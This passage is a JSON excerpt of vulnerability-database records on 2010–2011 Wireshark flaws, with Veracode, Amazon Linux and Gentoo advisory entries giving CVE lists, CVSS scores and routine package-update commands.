opened a malicious dump file.\n", "cvss3": {}, "published": "2020-04-10T00:49:54", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283"], "modified": "2022-04-19T18:25:00", "id": "VERACODE:24234", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24234/summary", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-27T10:57:09", "description": "wireshark is vulnerable to denial of service. The vulnerability exists as wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.\n", "cvss3": {}, "published": "2020-04-10T00:49:54", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "LOW", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 3.3, "vectorString": "AV:A/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2286"], "modified": "2022-04-19T18:17:58", "id": "VERACODE:24236", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24236/summary", "cvss": {"score": 3.3, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-27T10:47:10", "description": "wireshark is vulnerable to denial of service. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n", "cvss3": {}, "published": "2020-04-10T01:12:45", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1590"], "modified": "2022-04-19T18:23:31", "id": "VERACODE:25009", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25009/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-07-27T10:06:32", "description": "wireshark is vulnerable to denial of service (DoS). The vulnerability exists as wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.\n", "cvss3": {}, "published": "2020-04-10T00:49:54", "type": "veracode", "title": "Denial Of Service (DoS)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2284"], "modified": "2022-04-19T18:24:58", "id": "VERACODE:24235", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24235/summary", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-27T10:06:32", "description": "wireshark is vulnerable to arbitrary code execution. The vulnerability exists as multiple buffer overflow flaws were found in the Wireshark SigComp Universal Decompressor Virtual Machine (UDVM) dissector. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n", "cvss3": {}, "published": "2020-04-10T00:49:55", "type": "veracode", "title": "Arbitrary Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.5, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.3, "vectorString": "AV:A/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "ADJACENT_NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2287"], "modified": "2022-04-19T18:25:02", "id": "VERACODE:24237", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-24237/summary", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2021-07-25T19:33:41", "description": "**Issue Overview:**\n\nSeveral flaws were found in Wireshark. If Wireshark read a malformed packet off a network or opened a malicious dump file, it could crash or, possibly, execute arbitrary code as the user running Wireshark.\n\nSeveral denial of service flaws were found in Wireshark. Wireshark could crash or stop responding if it read a malformed packet off a network, or opened a malicious dump file.\n\n \n**Affected Packages:** \n\n\nwireshark\n\n \n**Issue Correction:** \nRun _yum update wireshark_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 wireshark-devel-1.2.15-2.10.amzn1.i686 \n \u00a0\u00a0\u00a0 wireshark-1.2.15-2.10.amzn1.i686 \n \u00a0\u00a0\u00a0 wireshark-debuginfo-1.2.15-2.10.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 wireshark-1.2.15-2.10.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 wireshark-debuginfo-1.2.15-2.10.amzn1.x86_64 \n \u00a0\u00a0\u00a0 wireshark-devel-1.2.15-2.10.amzn1.x86_64 \n \u00a0\u00a0\u00a0 wireshark-1.2.15-2.10.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {}, "published": "2012-04-30T16:16:00", "type": "amazon", "title": "Medium: wireshark", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-1143", "CVE-2011-1590"], "modified": "2014-09-14T15:50:00", "id": "ALAS-2012-071", "href": "https://alas.aws.amazon.com/ALAS-2012-71.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "gentoo": [{"lastseen": "2022-01-17T19:13:32", "description": "### Background\n\nWireshark is a versatile network protocol analyzer.\n\n### Description\n\nMultiple vulnerabilities have been discovered in Wireshark. Please review the CVE identifiers referenced below for details. \n\n### Impact\n\nA remote attacker could send specially crafted packets on a network being monitored by Wireshark, entice a user to open a malformed packet trace file using Wireshark, or deploy a specially crafted Lua script for use by Wireshark, possibly resulting in the execution of arbitrary code, or a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Wireshark users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-analyzer/wireshark-1.4.9\"", "cvss3": {}, "published": "2011-10-09T00:00:00", "type": "gentoo", "title": "Wireshark: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2283", "CVE-2010-2284", "CVE-2010-2285", "CVE-2010-2286", "CVE-2010-2287", "CVE-2010-2992", "CVE-2010-2993", "CVE-2010-2994", "CVE-2010-2995", "CVE-2010-3133", "CVE-2010-3445", "CVE-2010-4300", "CVE-2010-4301", "CVE-2010-4538", "CVE-2011-0024", "CVE-2011-0444", "CVE-2011-0445", "CVE-2011-0538", "CVE-2011-0713", "CVE-2011-1138", "CVE-2011-1139", "CVE-2011-1140", "CVE-2011-1141", "CVE-2011-1142", "CVE-2011-1143", "CVE-2011-1590", "CVE-2011-1591", "CVE-2011-1592", "CVE-2011-1956", "CVE-2011-1957", "CVE-2011-1958", "CVE-2011-1959", "CVE-2011-2174", "CVE-2011-2175", "CVE-2011-2597", "CVE-2011-2698", "CVE-2011-3266", "CVE-2011-3360", "CVE-2011-3482", "CVE-2011-3483"], "modified": "2011-10-09T00:00:00", "id": "GLSA-201110-02", "href": "https://security.gentoo.org/glsa/201110-02", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}